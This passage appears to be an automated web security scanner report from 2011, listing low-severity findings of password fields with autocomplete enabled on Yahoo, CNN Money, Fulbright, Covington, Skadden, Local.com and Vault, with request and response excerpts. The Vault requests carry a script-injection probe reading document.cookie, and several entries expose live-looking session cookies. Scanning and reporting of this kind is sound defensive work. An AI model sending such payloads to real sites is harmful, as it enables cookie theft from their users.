Date: Wed, 19 Jan 2011 18:10:05 GMT
Connection: close
Content-Length: 2619

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<td height="221"><form method="POST" action="trackerscripts/TrkrPWchk.exe">
<p>
...[SNIP]...
<td><input type="password" size="21" name="password" /></td>
...[SNIP]...

11.4. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /config/login HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:20 GMT
Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 41558


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</legend>


<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="" name="login_form" onsubmit="return hash2(this)">

<input type="hidden" name=".tries" value="1">
...[SNIP]...
</label>
<input name='passwd' id='passwd' type='password' maxlength='64' tabindex='2'>
</div>
...[SNIP]...

11.5. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /magazines/fortune/bestcompanies/2010/snapshots/65.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:25:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Wed, 19 Jan 2011 15:26:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 75163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-c
...[SNIP]...
<!-- start login -->
           <form onsubmit="return false;" id="cnnMoneyConnectFormLogin" class="overlay_content">
               <a href="javascript:void(0)" class="close">
...[SNIP]...
</p>
               <input class="" id="passwordinput" name="password" type="password">
               <div id="cnnConnectLoginErrors" style="display: none;">
...[SNIP]...

11.6. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /magazines/fortune/bestcompanies/2010/snapshots/65.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:25:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Wed, 19 Jan 2011 15:26:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 75163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-c
...[SNIP]...
<!-- start registration -->    
           <form onsubmit="return false;" id="cnnConnectFormRegister" class="overlay_content">
               <a href="javascript:void(0)" class="close">
...[SNIP]...
</p>
               <input id="signup_password" name="password" maxlength="10" type="password" />
               <span class="fieldTip">
...[SNIP]...

11.7. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /magazines/fortune/bestcompanies/2010/snapshots/65.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:25:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Wed, 19 Jan 2011 15:26:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 75163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-c
...[SNIP]...
<!-- start reset password -->    
           <form id="cnnConnectFormReset" class="overlay_content">
               <a href="javascript:void(0)" class="close">
...[SNIP]...
</p>
               <input type="password" id="new_password" name="newPassword">
               <div id="cnnConnectResetErrors">
...[SNIP]...

11.8. http://www.fulbright.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A31%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D512%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:49:31 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
</p>

<form id="insitesearch" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=220" method="post">
<div class="clearfix">
...[SNIP]...
</label>
   <input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
</p>
...[SNIP]...

11.9. http://www.fulbright.com/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.cfm HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFCLIENT_WWW2=recentsearch%3D%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D6%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
</p>

<form id="insitesearch" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=220" method="post">
<div class="clearfix">
...[SNIP]...
</label>
   <input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
</p>
...[SNIP]...

11.10. http://www.fulbright.com/insite  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...
<br />
   <form id="loginOptIn" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=1199" method="post">

<label for="username">
...[SNIP]...
<br />
<input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
<br />
...[SNIP]...

11.11. http://www.fulbright.com/insite  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...
<br />
   <form id="insitesearch" name="OptInRegister" action="/index.cfm?fuseaction=optin.actLogin&site_id=1199" method="post">
<label for="username">
...[SNIP]...
<br />
<input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
<br />
...[SNIP]...

11.12. http://www.local.com/results.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 72932
Date: Wed, 19 Jan 2011 16:52:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=ttvxzdezqtxibt55l2f5dv45; path=/; HttpOnly
Set-Cookie: localcom=cid=710&loc=Dallas%2c+TX&kw=none&uid=7504aafd-2c5e-48d0-90d2-473f5c5bc81d&expdate=634336159361775734&bc=Results+for+none+in+Dallas%2c+TX|serp|%2fresults.aspx&rs=none|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:52:16 GMT; path=/
Content-Length: 72932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX none | Find none i
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

11.13. http://www.local.com/results.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 138085
Date: Wed, 19 Jan 2011 16:52:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=pk4wl545lav5a245t34d1zys; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22&loc=Dallas%2c+TX&kw=law+offices&uid=5331dc09-813f-4b95-9237-fac957ebffac&expdate=634336159381535318&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:52:18 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22&exp=634310257381535318; domain=local.com; expires=Wed, 19-Jan-2011 17:22:18 GMT; path=/
Content-Length: 138085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

11.14. http://www.political.cov.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.political.cov.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.political.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/
Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>Covington Political Broadcasting Law</title
...[SNIP]...
<div id="right_col_login_area">
                   Member Login
                   <form action="/login.cfm" method="POST" style="margin-top:7px; margin-bottom:0px;">
                       <div style="padding-bottom: 5px;">
...[SNIP]...
</div>
                                   <input type="password" class="small_text_box" name="password" maxlength="12" /></td>
...[SNIP]...

11.15. http://www.skadden.com/alumni/Index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /alumni/Index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /alumni/Index.cfm HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                           <!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w
...[SNIP]...
<td align="left" valign="top">
<form method="post" action="alumni_authenticate.cfm" id="loginFrm">

   <!--table-->
...[SNIP]...
<td valign="top" style="padding-bottom:6px;"><input class="formLogin" type="password" name="aPassword" maxlength="75" onkeypress="checkEnterAlumni(event)" /></td>
...[SNIP]...

11.16. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:09 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:13 GMT;path=/
Content-Length: 37405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date
...[SNIP]...
</div>

<form method="post" action="/wps/portal/usa/membership">
                   
                   <input type="hidden" name="lastPage" value="/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWk
...[SNIP]...
</label>
                       <input id="UserPassword" name="UserPassword" type="password" value="" onfocus="this.value=''" />
                       <br clear="all" />
...[SNIP]...
</label>
                       <input id="UserConfirm" name="UserConfirm" type="password" value="" onfocus="this.value=''" />
                       <label for="zip-code">
...[SNIP]...

11.17. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:09 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:13 GMT;path=/
Content-Length: 37405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date
...[SNIP]...
</div>

<form method="post" action="/wps/portal/usa/membership">

                   <input type="hidden" name="lastPage" value="/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlV
...[SNIP]...
</label>
                       <input id="UserPassword" name="UserPassword" type="password" value="" onfocus="this.value=''" />
                       <br clear="all" />
...[SNIP]...
</label>
                       <input id="UserConfirm" name="UserConfirm" type="password" value="" onfocus="this.value=''" />
                       <label for="zip-code">
...[SNIP]...

